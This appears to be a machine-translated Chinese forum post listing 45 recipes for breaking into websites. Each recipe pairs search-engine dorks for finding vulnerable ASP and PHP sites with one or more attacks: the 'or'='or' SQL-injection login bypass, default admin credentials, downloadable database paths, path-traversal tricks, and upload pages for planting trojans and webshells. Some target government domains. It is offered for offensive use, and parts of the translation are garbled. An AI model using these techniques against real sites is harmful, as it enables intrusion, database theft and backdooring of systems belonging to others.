1,
Go to GoogLe, search for some keywords, edit.asp? There are many Korean broilers, most of which are MSSQL databases!
2,
Go to Google, site:cq.cn inurl:asp
3,
Utilize digging chicken and an ASP Trojan.
The file name is login.asp
The path group is /manage/
The key word is went.asp
Use 'or' = 'or' to land
4,
Keywords: Co Net MIB Ver 1.0 Website Background Management System
Account password is 'or'='or'
5.
Dynamic shopping system
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp and upLoad_c1.asp are two random choices, and most administrators ignore these two vulnerabilities
6。
The default database address is blogdata/acblog.asa
Keywords: acblog
7.
Baidu /htdocs
You can upload ASA files directly in the registration!
8.
/Database/#newasp.mdb
Keywords: NewAsp SiteManageSystem Version
9.
With an excavator
Keywords: Powered by WEBBOY
Page: /upfile.asp
10.
Search for the keyword Ver5.0 Build 0519 in baidu
(There is an upload vulnerability)
11.
Upfile_Article.asp bbs/upfile.asp
Enter keywords: powered by mypower ,
12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.
Now GOOGLE searches for the keyword intitle:website assistant inurl:asp
14.
Keywords: Home Latest News Beginner's Guide Dance Music Download Center Classic Articles Player Style Equipment Purchase Site Rumors Friendship Connection This site forum
Dig the keyword of chicken Tim setup.asp
15.
Database of the VBulletin forum
Default database address!
/includes/functions.php
Tools:
1. Website Hunter Download address: Baidu Google!
2.Google
Keywords:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
One of them will do
16.
1. Open Baidu or GOOGLE search and enter powered by comersus ASP shopping cart
open source。 This is a mall system.
2. At the bottom of the website, there is a Comersus Open Technologies LC. Open it and see ~~comersus system~
Guess comersus.mdb. is the database name
The database is placed after database/,
So database/comersus.mdb
comersus_listCategoriesTree.asp changed to database/comersus.mdb, and cannot be downloaded.
Then remove the previous store/ and add database/comersus.mdb to try
17.
Worry-free Legend official site program.
1. Background management address: http:// your domain name /msmiradmin/
2. Default background management account: msmir
3. Default background management password: msmirmsmir
The database file is http:// your domain name /msmirdata/msmirArticle.mdb
The database connection file is ***********/Conn.asp
18.
Enter /skins/default/ in Baidu.
19.
Utilize excavators
Critical Mechanism: power by Discuz
Path: /wish.php
Cooperation:
Discuz! forum wish.php remote inclusion vulnerability tool use
20.
Upload vulnerabilities.
Tool: Domain3.5
Website Hunter version 1.5
Keyword powered by mypower
Detected pages or files are inserted into upfile_photo.asp
21.
New cloud vulnerabilities
This vulnerability is a one-size-fits-all for ACCESS and SQL.
Google search keywords "About this site - Site Help - Advertising Cooperation - Download Statement - Friendship Connection - Sitemap - Manage Login"
Flash/downfile.asp?url=uploadfile/: /.. /conn.asp commit to the site root. You can download conn.asp
Most of them are source code, software, etc. download stations.
You often encounter that if the database is + in the front or middle, # can be replaced with %23 to download
\database\%23newasp.mdb
For example:#xzws.mdb change to %23xzws.mdb
22.
All Eat All Malls + Power Upload System
Tools used: Dig Chicken v1.1 Ming Boy
Marketplace**:
Keywords: Shopping->Add to cart->Go to the cashier->Confirm the consignee information-> payment method-> delivery method-> pay online or remit money after placing an order-> remittance confirmation->delivery-> completion
Vulnerability page :upload.asp
upfile_flash.asp
Power**:
Keywords: powered by mypower
The vulnerability page :upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
Inject vulnerabilities
Baidu searches ioj's blog
24
Movement is easy
Column table of contents
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
Tools: Website Hunter
Keywords:inurl:Went.asp
suffix: manage/login.asp
Password: 'or'='or'
26.
**Warcraft Private Server
Tools needed: An ASP Trojan.
Domain 3.5 Ming Kid
Keywords: All Right Reserved Design: Game Alliance
Background address: admin/login.asp
The address of the database: chngame/#chngame.mdb
27.
The vulnerability is a mistake that exploits the administrator's IIS settings
Using baidu keywords is a relatively rare script name
Moving Network: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
Movement: admin_articlerecyclebin.asp
28.
Database explosion vulnerabilities of foreign stations
Keywords: sad Raven's Guestbook
Password address: /passwd.dat
Background address: /admin.php
29.
Discuz 4.1.0 cross-site vulnerability
Utilize tools: 1. WAP browser
2. WAP encoding converter
Keywords: "intextiscuz!" 4.1.0"
30.
Keywords: Shanks
background path /system/manage.asp
Directly transmit ASP Trojans
31.
tools
1: Website hunter
2: Malaysia one
Keywords: Do not turn off cookies, otherwise you will not be able to log in
Insert diy.asp
32.
Keywords: Team5 Studio All rights reserved
Default database: data/team.mdb
33.
Tools: Excavator Fuchen Database Reader
Keywords: Company Profile Product Display Product Listing
Suffix added: /database/myszw.mdb
Background address: admin/Login.asp
34.
Key sub-XXX inurl:Nclass.asp
Write a Trojan in "System Settings".
will be saved to the config.asp.
35.
If you don't enter the background, you still use the WEBSHELL
data.asp?action=BackupData The default path for the database backup
36.
Tool: WebShell for Website Hunter
Keywords:inurl:Went.asp
suffix: manage/login.asp
Weak password: 'or'='or'
37.
Keywords: owered byCDN_NEWS
Scan the article and add a ' to test the injection point
The backend address :admin_index.asp
38.
**Thunder Pool Press Release System
Keywords: leichinews
Remove the one after leichinews.
Tag: admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
Then upload the horse.....
Visit Uppic anran.asp Landing Horse.
39.
Keywords: ower System Of Article Management Ver 3.0 Build 20030628
Default database: database\yiuwekdsodksldfslwifds.mdb
Background address: Scan yourself!
40.
1. Find a large number of injection points through GOOGLE search
Keywords: asp?id=1 gov.jp/ asp?id=
Number of pages: 100
Language: Fill in any language you want to **
41.
Keywords: Powered by:94KKBBS 2005
Use the password recovery function to retrieve the admin
Question: ddddd Answer: dddddd
42.
Keywords:inurl:Went.asp
The background is manage/login.asp
Background password: 'or'=' or 'or'='or' Login to enter
The default database address is atabase/DataShop.mdb
43.
Keywords: ****** inurl:readnews.asp
Change the last one/to %5c, directly expose the database, look at the password, and enter the background
Just add a news Enter our sentence Trojan in the title
44.
Tool: A Trojan horse
BBsXp 5.0 sp1 admin guesser
Keywords: powered by bbsxp5.00
Go into the background and back up a sentence!
45.
Keywords: Program core: BJXSHOP online store opening expert
Background: /admin
|
Posted on 12/22/2014 11:11:20 PM
|
|
|
Posted on 7/20/2017 6:57:43 AM
|
